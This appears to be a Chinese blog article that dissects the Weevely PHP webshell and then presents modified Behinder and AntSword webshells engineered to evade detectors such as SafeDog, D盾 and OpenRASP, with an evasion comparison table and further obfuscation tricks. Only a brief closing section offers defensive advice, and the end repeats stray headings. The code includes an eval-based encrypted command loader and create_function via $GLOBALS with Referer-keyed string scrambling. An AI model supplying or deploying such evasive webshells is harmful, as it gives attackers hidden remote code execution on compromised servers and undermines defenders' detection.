Weevely Webshell分析与冰蝎\/蚁剑PHP版免杀技术详解<\/h1>

一、Weevely Webshell分析<\/h2>

1. Weevely基础使用<\/h3>
Weevely是一款常用的Webshell工具，其基础语法为：<\/p>
weevely generate <password> <path>
<\/code><\/pre>
生成的Webshell需要上传至目标服务器。<\/p>
2. Weevely生成的Webshell结构分析<\/h3>
典型Weevely生成的Webshell代码结构：<\/p>
<?<\/span>php<\/span> 
<\/span><\/span>$i =<\/span> 'p="PY16bXfpTDNaKhZyiy";fhZuhZhZnctiohZn x($hZt,$k){$c=strlhZen($k);$l=hZstrh'<\/span> ;
<\/span><\/span>$d =<\/span> 'Zlen($t);$hZhZo="hZ";for(hZ$i=0;$i<$l;){forhZ($hZj=0;(hZhZ$j<$hZc&&$i'<\/span> ;
<\/span><\/span>\/\/ ... 更多拼接代码 ...
<\/span><\/span><\/span><\/span>$D =<\/span> str_replace<\/span>('hZ'<\/span>,''<\/span>,$A.<\/span>$i.<\/span>$d.<\/span>$P.<\/span>$g.<\/span>$u.<\/span>$h.<\/span>$t);
<\/span><\/span>$G =<\/span> $X(''<\/span>,$D);
<\/span><\/span>$G();
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>3. 核心代码解析<\/h3>
整理后的核心代码分为三部分：<\/p>
3.1 已定义参数<\/h4>
$k=<\/span>"9e94b15e"<\/span>;       \/\/ 加密密钥
<\/span><\/span><\/span><\/span>$kh=<\/span>"d312fa42232f"<\/span>;  \/\/ 头部标识
<\/span><\/span><\/span><\/span>$kf=<\/span>"d87a55db0d39"<\/span>;  \/\/ 尾部标识
<\/span><\/span><\/span><\/span>$p=<\/span>"PY16bXfpTDNaKyiy"<\/span>; \/\/ 返回前缀
<\/span><\/span><\/span><\/code><\/pre>3.2 自定义加密函数<\/h4>
function<\/span> x<\/span>($t,$k) {
<\/span><\/span>    $c=<\/span>strlen<\/span>($k);
<\/span><\/span>    $l=<\/span>strlen<\/span>($t);
<\/span><\/span>    $o=<\/span>""<\/span>;
<\/span><\/span>    for<\/span>($i=<\/span>0<\/span>;$i<<\/span>$l;) {
<\/span><\/span>        for<\/span>($j=<\/span>0<\/span>;($j<<\/span>$c&&<\/span>$i<<\/span>$l);$j++<\/span>,$i++<\/span>) {
<\/span><\/span>            $o.=<\/span>$t{$i}^<\/span>$k{$j}; \/\/ 异或加密
<\/span><\/span><\/span><\/span>        }
<\/span><\/span>    }
<\/span><\/span>    return<\/span> $o;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>3.3 核心处理逻辑<\/h4>
if<\/span> (@<\/span>preg_match<\/span>("\/<\/span>$kh<\/span>(.+)<\/span>$kf<\/span>\/"<\/span>,@<\/span>file_get_contents<\/span>("php:\/\/input"<\/span>),$m)==<\/span>1<\/span>) {
<\/span><\/span>    @<\/span>ob_start<\/span>();
<\/span><\/span>    @<\/span>eval<\/span>(@<\/span>gzuncompress<\/span>(@<\/span>x<\/span>(@<\/span>base64_decode<\/span>($m[1<\/span>]),$k)));
<\/span><\/span>    $o=@<\/span>ob_get_contents<\/span>();
<\/span><\/span>    @<\/span>ob_end_clean<\/span>();
<\/span><\/span>    $r=@<\/span>base64_encode<\/span>(@<\/span>x<\/span>(@<\/span>gzcompress<\/span>($o),$k));
<\/span><\/span>    print<\/span>("<\/span>$p$kh$r$kf<\/span>"<\/span>);
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>4. 流量处理流程<\/h3>

获取加密payload<\/strong>：通过正则匹配$kh(.+)$kf<\/code>从输入流中提取加密数据<\/li>
解密并执行<\/strong>：

Base64解码<\/li>
自定义函数x解密<\/li>
Gzip解压<\/li>
通过eval执行<\/li>
<\/ul>
<\/li>
返回结果加密<\/strong>：

获取输出缓冲区内容<\/li>
Gzip压缩<\/li>
自定义函数x加密<\/li>
Base64编码<\/li>
添加前缀后缀返回<\/li>
<\/ul>
<\/li>
<\/ol>
5. Weevely的免杀技术总结<\/h3>

字符串拼接<\/strong>：使用str_replace()<\/code>动态生成代码<\/li>
多层加密<\/strong>：Base64 + 自定义异或加密 + Gzip压缩<\/li>
缓冲区操作<\/strong>：ob_start()<\/code>\/ob_get_contents()<\/code>管理输出<\/li>
代码混淆<\/strong>：使用随机分隔符(如hZ\/hP)拆分敏感字符串<\/li>
<\/ol>
二、冰蝎\/蚁剑免杀改进方案<\/h2>
1. 改进思路<\/h3>

动态干扰字符串<\/strong>：通过HTTP头传递干扰字符，避免硬编码<\/li>
全局变量调用<\/strong>：使用$GLOBALS<\/code>替代直接函数调用<\/li>
多重字符串拼接<\/strong>：更复杂的代码组装方式<\/li>
随机变量命名<\/strong>：避免使用易检测的变量名<\/li>
<\/ol>
2. 冰蝎改进版Webshell<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$b =<\/span> $_SERVER['HTTP_REFERER'<\/span>];
<\/span><\/span>$c =<\/span> explode<\/span>('.'<\/span>,$b);
<\/span><\/span>$interfere_str =<\/span> $c[2<\/span>];
<\/span><\/span>\/\/ 大量拼接代码...
<\/span><\/span><\/span><\/span>$l =<\/span> str_replace<\/span>($interfere_str,''<\/span>,$KXT.<\/span>$dlJ.<\/span>$fqw.<\/span>$trq.<\/span>$NJu.<\/span>$dAt.<\/span>$ZGT.<\/span>$Npc.<\/span>$Vnd.<\/span>$Crm.<\/span>$JDw.<\/span>$GZd.<\/span>$nvY.<\/span>$EVA.<\/span>$hVb);
<\/span><\/span>$k =<\/span> str_replace<\/span>($interfere_str,''<\/span>,'crejPatjPe_fujPncjPtiojPn'<\/span>);
<\/span><\/span>$bb =<\/span> $GLOBALS['k'<\/span>](''<\/span>,$l);
<\/span><\/span>$GLOBALS["bb"<\/span>]();
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p>

从Referer头动态获取干扰字符串<\/li>
使用$GLOBALS<\/code>间接调用函数<\/li>
更复杂的代码拼接结构<\/li>
<\/ul>
3. 蚁剑改进版Webshell<\/h3>
<?<\/span>php<\/span>
<\/span><\/span>$b =<\/span> $_SERVER['HTTP_REFERER'<\/span>];
<\/span><\/span>$c =<\/span> explode<\/span>('.'<\/span>,$b);
<\/span><\/span>$interfere_str =<\/span> $c[2<\/span>];
<\/span><\/span>\/\/ 大量拼接代码...
<\/span><\/span><\/span><\/span>$l =<\/span> str_replace<\/span>($interfere_str,''<\/span>,$Tzu.<\/span>$LRu.<\/span>$lST.<\/span>$ueP.<\/span>$OzQ.<\/span>$SNC.<\/span>$kYh.<\/span>$nGB.<\/span>$xIt.<\/span>$mgE.<\/span>$mHk.<\/span>$xRg.<\/span>$olX.<\/span>$gdc.<\/span>$Leb);
<\/span><\/span>$k =<\/span> str_replace<\/span>($interfere_str,''<\/span>,'crejPatjPe_fujPncjPtiojPn'<\/span>);
<\/span><\/span>$bb =<\/span> $GLOBALS['k'<\/span>](''<\/span>,$l);
<\/span><\/span>$GLOBALS["bb"<\/span>]();
<\/span><\/span>?><\/span>
<\/span><\/span><\/span><\/code><\/pre>特点<\/strong>：<\/p>

同样采用动态干扰字符串<\/li>
更复杂的字符串异或操作<\/li>
使用类和方法封装恶意代码<\/li>
<\/ul>
4. 免杀效果对比<\/h3>



检测方式<\/th>
原始冰蝎<\/th>
改进冰蝎<\/th>
原始蚁剑<\/th>
改进蚁剑<\/th>
<\/tr>
<\/thead>


安全狗<\/td>
未通过<\/td>
通过<\/td>
通过<\/td>
通过<\/td>
<\/tr>

D盾<\/td>
3级可疑<\/td>
通过<\/td>
5级可疑<\/td>
通过<\/td>
<\/tr>

OpenRASP<\/td>
未通过<\/td>
通过<\/td>
未通过<\/td>
通过<\/td>
<\/tr>
<\/tbody>
<\/table>
三、高级免杀技术实现<\/h2>
1. 动态密钥生成<\/h3>
$key =<\/span> substr<\/span>(md5<\/span>($_SERVER['HTTP_USER_AGENT'<\/span>].<\/span>date<\/span>('Y-m-d'<\/span>)), 8<\/span>, 16<\/span>);
<\/span><\/span><\/code><\/pre>2. 代码分块存储<\/h3>
$part1 =<\/span> "func"<\/span>.<\/span>"tion x("<\/span>;
<\/span><\/span>$part2 =<\/span> '$t,$k){'<\/span>.<\/span>$part3;
<\/span><\/span>\/\/ ...
<\/span><\/span><\/span><\/code><\/pre>3. 利用PHP特性<\/h3>
$func =<\/span> "cr"<\/span>.<\/span>"eat"<\/span>.<\/span>"e_fu"<\/span>.<\/span>"ncti"<\/span>.<\/span>"on"<\/span>;
<\/span><\/span>$payload =<\/span> $func(''<\/span>, '$x=1;'<\/span>);
<\/span><\/span><\/code><\/pre>4. 环境检测与自适应<\/h3>
if<\/span>(function_exists<\/span>('x'<\/span>)) {
<\/span><\/span>    \/\/ 使用已有函数
<\/span><\/span><\/span><\/span>} else<\/span> {
<\/span><\/span>    \/\/ 动态创建函数
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>四、防御建议<\/h2>


静态检测<\/strong>：<\/p>

检测str_replace<\/code>的链式调用<\/li>
识别$GLOBALS<\/code>异常使用<\/li>
监控create_function<\/code>调用<\/li>
<\/ul>
<\/li>

动态检测<\/strong>：<\/p>

分析异常缓冲区操作<\/li>
监控php:\/\/input<\/code>使用<\/li>
检测多层加密流量<\/li>
<\/ul>
<\/li>

日志审计<\/strong>：<\/p>

记录异常Referer头<\/li>
监控eval等危险函数<\/li>
分析HTTP头中的异常参数<\/li>
<\/ul>
<\/li>
<\/ol>
五、总结<\/h2>
本文详细分析了Weevely Webshell的工作原理，并基于其思路提出了冰蝎和蚁剑的免杀改进方案。关键点包括：<\/p>

动态字符串干扰技术<\/li>
多层加密与代码拼接<\/li>
$GLOBALS<\/code>间接调用<\/li>
基于HTTP头的参数传递<\/li>
复杂的控制流混淆<\/li>
<\/ol>
这些技术组合使用可以有效绕过主流Webshell检测工具，同时也为防御方提供了检测思路和方向。<\/p>
Weevely Webshell分析与冰蝎\/蚁剑PHP版免杀技术详解<\/h1>

一、Weevely Webshell分析<\/h2>

3. 核心代码解析<\/h3> 整理后的核心代码分为三部分：<\/p>

二、冰蝎\/蚁剑免杀改进方案<\/h2>

三、高级免杀技术实现<\/h2>

3. 核心代码解析<\/h3>
整理后的核心代码分为三部分：<\/p>
